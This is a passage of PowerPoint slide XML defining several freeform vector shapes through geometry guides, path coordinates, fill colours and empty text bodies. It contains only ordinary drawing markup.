              <a:gd name="T31" fmla="*/ 2147483647 h 45"/>
              <a:gd name="T32" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T33" fmla="*/ 2147483647 h 45"/>
              <a:gd name="T34" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T35" fmla="*/ 2147483647 h 45"/>
              <a:gd name="T36" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T37" fmla="*/ 214748364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45"/>
              <a:gd name="T59" fmla="*/ 14 w 14"/>
              <a:gd name="T60" fmla="*/ 45 h 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45">
                <a:moveTo>
                  <a:pt x="14" y="1"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="14" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="45"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="45"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="45"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="44"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="44"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10" y="43"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12" y="42"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="41"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="1"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="D1F2F2"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10425" name="Freeform 506"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2762250" y="6381750"/>
            <a:ext cx="20637" cy="61913"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483647 w 9"/>
              <a:gd name="T1" fmla="*/ 2147483647 h 27"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 9"/>
              <a:gd name="T3" fmla="*/ 2147483647 h 27"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 9"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 27"/>
              <a:gd name="T6" fmla="*/ 2147483647 w 9"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 27"/>
              <a:gd name="T8" fmla="*/ 2147483647 w 9"/>
              <a:gd name="T9" fmla="*/ 0 h 27"/>
              <a:gd name="T10" fmla="*/ 2147483647 w 9"/>
              <a:gd name="T11" fmla="*/ 0 h 27"/>
              <a:gd name="T12" fmla="*/ 2147483647 w 9"/>
              <a:gd name="T13" fmla="*/ 2147483647 h 27"/>
              <a:gd name="T14" fmla="*/ 2147483647 w 9"/>
              <a:gd name="T15" fmla="*/ 2147483647 h 27"/>
              <a:gd name="T16" fmla="*/ 0 w 9"/>
              <a:gd name="T17" fmla="*/ 2147483647 h 27"/>
              <a:gd name="T18" fmla="*/ 0 w 9"/>
              <a:gd name="T19" fmla="*/ 2147483647 h 27"/>
              <a:gd name="T20" fmla="*/ 0 w 9"/>
              <a:gd name="T21" fmla="*/ 2147483647 h 27"/>
              <a:gd name="T22" fmla="*/ 2147483647 w 9"/>
              <a:gd name="T23" fmla="*/ 2147483647 h 27"/>
              <a:gd name="T24" fmla="*/ 2147483647 w 9"/>
              <a:gd name="T25" fmla="*/ 2147483647 h 27"/>
              <a:gd name="T26" fmla="*/ 2147483647 w 9"/>
              <a:gd name="T27" fmla="*/ 2147483647 h 27"/>
              <a:gd name="T28" fmla="*/ 2147483647 w 9"/>
              <a:gd name="T29" fmla="*/ 2147483647 h 27"/>
              <a:gd name="T30" fmla="*/ 2147483647 w 9"/>
              <a:gd name="T31" fmla="*/ 2147483647 h 27"/>
              <a:gd name="T32" fmla="*/ 2147483647 w 9"/>
              <a:gd name="T33" fmla="*/ 2147483647 h 27"/>
              <a:gd name="T34" fmla="*/ 2147483647 w 9"/>
              <a:gd name="T35" fmla="*/ 2147483647 h 27"/>
              <a:gd name="T36" fmla="*/ 2147483647 w 9"/>
              <a:gd name="T37" fmla="*/ 2147483647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27"/>
              <a:gd name="T59" fmla="*/ 9 w 9"/>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27">
                <a:moveTo>
                  <a:pt x="9" y="1"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="27"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="27"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="27"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="27"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="27"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="25"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8" y="24"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="23"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="1"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="E5FFFF"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10426" name="Freeform 507"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3011487" y="6556375"/>
            <a:ext cx="31750" cy="31750"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T1" fmla="*/ 2147483647 h 14"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T3" fmla="*/ 2147483647 h 14"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 14"/>
              <a:gd name="T6" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 14"/>
              <a:gd name="T8" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T9" fmla="*/ 2147483647 h 14"/>
              <a:gd name="T10" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T11" fmla="*/ 2147483647 h 14"/>
              <a:gd name="T12" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T13" fmla="*/ 2147483647 h 14"/>
              <a:gd name="T14" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T15" fmla="*/ 2147483647 h 14"/>
              <a:gd name="T16" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T17" fmla="*/ 2147483647 h 14"/>
              <a:gd name="T18" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T19" fmla="*/ 2147483647 h 14"/>
              <a:gd name="T20" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T21" fmla="*/ 2147483647 h 14"/>
              <a:gd name="T22" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T23" fmla="*/ 2147483647 h 14"/>
              <a:gd name="T24" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T25" fmla="*/ 2147483647 h 14"/>
              <a:gd name="T26" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T27" fmla="*/ 2147483647 h 14"/>
              <a:gd name="T28" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T29" fmla="*/ 0 h 14"/>
              <a:gd name="T30" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T31" fmla="*/ 0 h 14"/>
              <a:gd name="T32" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T33" fmla="*/ 0 h 14"/>
              <a:gd name="T34" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T35" fmla="*/ 0 h 14"/>
              <a:gd name="T36" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T37" fmla="*/ 0 h 14"/>
              <a:gd name="T38" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T39" fmla="*/ 2147483647 h 14"/>
              <a:gd name="T40" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T41" fmla="*/ 2147483647 h 14"/>
              <a:gd name="T42" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T43" fmla="*/ 2147483647 h 14"/>
              <a:gd name="T44" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T45" fmla="*/ 2147483647 h 14"/>
              <a:gd name="T46" fmla="*/ 0 w 14"/>
              <a:gd name="T47" fmla="*/ 2147483647 h 14"/>
              <a:gd name="T48" fmla="*/ 0 w 14"/>
              <a:gd name="T49" fmla="*/ 2147483647 h 14"/>
              <a:gd name="T50" fmla="*/ 0 w 14"/>
              <a:gd name="T51" fmla="*/ 2147483647 h 14"/>
              <a:gd name="T52" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T53" fmla="*/ 2147483647 h 14"/>
              <a:gd name="T54" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T55" fmla="*/ 2147483647 h 14"/>
              <a:gd name="T56" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T57" fmla="*/ 2147483647 h 14"/>
              <a:gd name="T58" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T59" fmla="*/ 2147483647 h 14"/>
              <a:gd name="T60" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T61" fmla="*/ 2147483647 h 14"/>
              <a:gd name="T62" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T63" fmla="*/ 2147483647 h 14"/>
              <a:gd name="T64" fmla="*/ 2147483647 w 14"/>
              <a:gd name="T65" fmla="*/ 2147483647 h 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
              <a:gd name="T100" fmla="*/ 0 h 14"/>
              <a:gd name="T101" fmla="*/ 14 w 14"/>
              <a:gd name="T102" fmla="*/ 14 h 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 h="14">
                <a:moveTo>
                  <a:pt x="7" y="14"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9" y="14"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10" y="13"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11" y="13"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12" y="11"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13" y="10"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13" y="9"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="8"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="8"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="9"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="10"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="11"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="13"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="13"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="14"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="14"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10427" name="Freeform 508"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2921000" y="6556375"/>
            <a:ext cx="15875" cy="15875"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483647 w 7"/>
              <a:gd name="T1" fmla="*/ 2147483647 h 7"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 7"/>
              <a:gd name="T3" fmla="*/ 2147483647 h 7"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 7"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 7"/>
              <a:gd name="T6" fmla="*/ 2147483647 w 7"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 7"/>
              <a:gd name="T8" fmla="*/ 2147483647 w 7"/>
              <a:gd name="T9" fmla="*/ 2147483647 h 7"/>
              <a:gd name="T10" fmla="*/ 2147483647 w 7"/>
              <a:gd name="T11" fmla="*/ 2147483647 h 7"/>
              <a:gd name="T12" fmla="*/ 2147483647 w 7"/>
              <a:gd name="T13" fmla="*/ 2147483647 h 7"/>
              <a:gd name="T14" fmla="*/ 2147483647 w 7"/>
              <a:gd name="T15" fmla="*/ 0 h 7"/>
              <a:gd name="T16" fmla="*/ 2147483647 w 7"/>
              <a:gd name="T17" fmla="*/ 0 h 7"/>
              <a:gd name="T18" fmla="*/ 2147483647 w 7"/>
              <a:gd name="T19" fmla="*/ 0 h 7"/>
              <a:gd name="T20" fmla="*/ 2147483647 w 7"/>
              <a:gd name="T21" fmla="*/ 2147483647 h 7"/>
              <a:gd name="T22" fmla="*/ 0 w 7"/>
              <a:gd name="T23" fmla="*/ 2147483647 h 7"/>
              <a:gd name="T24" fmla="*/ 0 w 7"/>
              <a:gd name="T25" fmla="*/ 2147483647 h 7"/>
              <a:gd name="T26" fmla="*/ 0 w 7"/>
              <a:gd name="T27" fmla="*/ 2147483647 h 7"/>
              <a:gd name="T28" fmla="*/ 2147483647 w 7"/>
              <a:gd name="T29" fmla="*/ 2147483647 h 7"/>
              <a:gd name="T30" fmla="*/ 2147483647 w 7"/>
              <a:gd name="T31" fmla="*/ 2147483647 h 7"/>
              <a:gd name="T32" fmla="*/ 2147483647 w 7"/>
              <a:gd name="T33" fmla="*/ 214748364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7"/>
              <a:gd name="T53" fmla="*/ 7 w 7"/>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7">
                <a:moveTo>
                  <a:pt x="3" y="7"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="7"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10428" name="Freeform 509"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2944812" y="6556375"/>
            <a:ext cx="14288" cy="15875"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483647 w 6"/>
              <a:gd name="T1" fmla="*/ 2147483647 h 7"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 6"/>
              <a:gd name="T3" fmla="*/ 2147483647 h 7"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 6"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 7"/>
              <a:gd name="T6" fmla="*/ 2147483647 w 6"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 7"/>
              <a:gd name="T8" fmla="*/ 2147483647 w 6"/>
              <a:gd name="T9" fmla="*/ 2147483647 h 7"/>
              <a:gd name="T10" fmla="*/ 2147483647 w 6"/>
              <a:gd name="T11" fmla="*/ 2147483647 h 7"/>
              <a:gd name="T12" fmla="*/ 2147483647 w 6"/>
              <a:gd name="T13" fmla="*/ 2147483647 h 7"/>
              <a:gd name="T14" fmla="*/ 2147483647 w 6"/>
              <a:gd name="T15" fmla="*/ 2147483647 h 7"/>
              <a:gd name="T16" fmla="*/ 2147483647 w 6"/>
              <a:gd name="T17" fmla="*/ 0 h 7"/>
              <a:gd name="T18" fmla="*/ 2147483647 w 6"/>
              <a:gd name="T19" fmla="*/ 2147483647 h 7"/>
              <a:gd name="T20" fmla="*/ 2147483647 w 6"/>
              <a:gd name="T21" fmla="*/ 2147483647 h 7"/>
              <a:gd name="T22" fmla="*/ 0 w 6"/>
              <a:gd name="T23" fmla="*/ 2147483647 h 7"/>
              <a:gd name="T24" fmla="*/ 0 w 6"/>
              <a:gd name="T25" fmla="*/ 2147483647 h 7"/>
              <a:gd name="T26" fmla="*/ 0 w 6"/>
              <a:gd name="T27" fmla="*/ 2147483647 h 7"/>
              <a:gd name="T28" fmla="*/ 2147483647 w 6"/>
              <a:gd name="T29" fmla="*/ 2147483647 h 7"/>
              <a:gd name="T30" fmla="*/ 2147483647 w 6"/>
              <a:gd name="T31" fmla="*/ 2147483647 h 7"/>
              <a:gd name="T32" fmla="*/ 2147483647 w 6"/>
              <a:gd name="T33" fmla="*/ 214748364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7"/>
              <a:gd name="T53" fmla="*/ 6 w 6"/>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7">
                <a:moveTo>
                  <a:pt x="4" y="7"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="7"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10429" name="Freeform 510"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2843212" y="6345238"/>
            <a:ext cx="41275" cy="211137"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483647 w 18"/>
              <a:gd name="T1" fmla="*/ 2147483647 h 93"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 18"/>
              <a:gd name="T3" fmla="*/ 2147483647 h 93"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 18"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 93"/>
              <a:gd name="T6" fmla="*/ 2147483647 w 18"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 93"/>
              <a:gd name="T8" fmla="*/ 2147483647 w 18"/>
              <a:gd name="T9" fmla="*/ 2147483647 h 93"/>
              <a:gd name="T10" fmla="*/ 0 w 18"/>
              <a:gd name="T11" fmla="*/ 2147483647 h 93"/>
              <a:gd name="T12" fmla="*/ 0 w 18"/>
              <a:gd name="T13" fmla="*/ 2147483647 h 93"/>
              <a:gd name="T14" fmla="*/ 2147483647 w 18"/>
              <a:gd name="T15" fmla="*/ 2147483647 h 93"/>
              <a:gd name="T16" fmla="*/ 2147483647 w 18"/>
              <a:gd name="T17" fmla="*/ 2147483647 h 93"/>
              <a:gd name="T18" fmla="*/ 2147483647 w 18"/>
              <a:gd name="T19" fmla="*/ 2147483647 h 93"/>
              <a:gd name="T20" fmla="*/ 2147483647 w 18"/>
              <a:gd name="T21" fmla="*/ 2147483647 h 93"/>
              <a:gd name="T22" fmla="*/ 2147483647 w 18"/>
              <a:gd name="T23" fmla="*/ 2147483647 h 93"/>
              <a:gd name="T24" fmla="*/ 2147483647 w 18"/>
              <a:gd name="T25" fmla="*/ 2147483647 h 93"/>
              <a:gd name="T26" fmla="*/ 2147483647 w 18"/>
              <a:gd name="T27" fmla="*/ 2147483647 h 93"/>
              <a:gd name="T28" fmla="*/ 2147483647 w 18"/>
              <a:gd name="T29" fmla="*/ 2147483647 h 93"/>
              <a:gd name="T30" fmla="*/ 2147483647 w 18"/>
              <a:gd name="T31" fmla="*/ 2147483647 h 93"/>
              <a:gd name="T32" fmla="*/ 2147483647 w 18"/>
              <a:gd name="T33" fmla="*/ 2147483647 h 93"/>
              <a:gd name="T34" fmla="*/ 2147483647 w 18"/>
              <a:gd name="T35" fmla="*/ 2147483647 h 93"/>
              <a:gd name="T36" fmla="*/ 2147483647 w 18"/>
              <a:gd name="T37" fmla="*/ 2147483647 h 93"/>
              <a:gd name="T38" fmla="*/ 2147483647 w 18"/>
              <a:gd name="T39" fmla="*/ 0 h 93"/>
              <a:gd name="T40" fmla="*/ 2147483647 w 18"/>
              <a:gd name="T41" fmla="*/ 0 h 93"/>
              <a:gd name="T42" fmla="*/ 2147483647 w 18"/>
              <a:gd name="T43" fmla="*/ 0 h 93"/>
              <a:gd name="T44" fmla="*/ 2147483647 w 18"/>
              <a:gd name="T45" fmla="*/ 0 h 93"/>
              <a:gd name="T46" fmla="*/ 2147483647 w 18"/>
              <a:gd name="T47" fmla="*/ 0 h 93"/>
              <a:gd name="T48" fmla="*/ 2147483647 w 18"/>
              <a:gd name="T49" fmla="*/ 0 h 93"/>
              <a:gd name="T50" fmla="*/ 2147483647 w 18"/>
              <a:gd name="T51" fmla="*/ 2147483647 h 9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
              <a:gd name="T79" fmla="*/ 0 h 93"/>
              <a:gd name="T80" fmla="*/ 18 w 18"/>
              <a:gd name="T81" fmla="*/ 93 h 9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 h="93">
                <a:moveTo>
                  <a:pt x="6" y="2"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="9"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="17"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="29"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="41"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="58"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="74"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="93"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18" y="93"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17" y="89"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16" y="82"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15" y="71"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="58"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13" y="43"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13" y="27"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15" y="13"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="2"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="3F9EFF"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10430" name="Freeform 511"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3065462" y="6321425"/>
            <a:ext cx="60325" cy="234950"/>
          </a:xfrm>
